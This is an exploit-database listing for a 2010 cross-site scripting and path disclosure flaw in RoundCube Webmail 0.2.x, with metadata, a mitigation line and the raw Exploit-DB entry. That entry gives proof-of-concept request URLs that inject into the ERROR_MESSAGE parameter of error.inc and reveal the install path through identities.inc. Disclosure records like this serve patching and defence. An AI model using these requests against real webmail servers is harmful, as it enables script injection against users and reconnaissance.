header-logo
Suggest Exploit
vendor:
RoundCube Webmail
by:
j4ck & Globus
7,5
CVSS
HIGH
XSS
79
CWE
Product Name: RoundCube Webmail
Affected Version From: 0.2.X
Affected Version To: Unknown
Patch Exists: YES
Related CWE: N/A
CPE: a:roundcube:roundcube_webmail
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: *
2010

RoundCube Webmail XSS Voulerability

A vulnerability exists in RoundCube Webmail versions 0.2.X and possibly higher. An attacker can inject malicious JavaScript code into the ERROR_MESSAGE parameter of the error.inc file, which is then executed in the browser of the victim. The attacker can also obtain the FPD or RoundCube installation path via the identities.inc file.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

# Exploit Title: RoundCube Webmail XSS Voulerability
# Date: 6.01.2010
# Author: j4ck & Globus from elitehackers.pl
# Software Link: Software link : http://roundcube.net/download
# Version: 0.2.X , | possible voulerability in higher versions.
# Tested on: *
# Code :

XSS:

http://[somesite.com]/[roundcube_path]/program/steps/error.inc?ERROR_CODE=601&ERROR_MESSAGE=123

We can get FPD or roundcube installation path via:

http://www.[somesite.com]/webmail/program/steps/settings/identities.inc

Navigation

Suggest Exploit

Services By CQR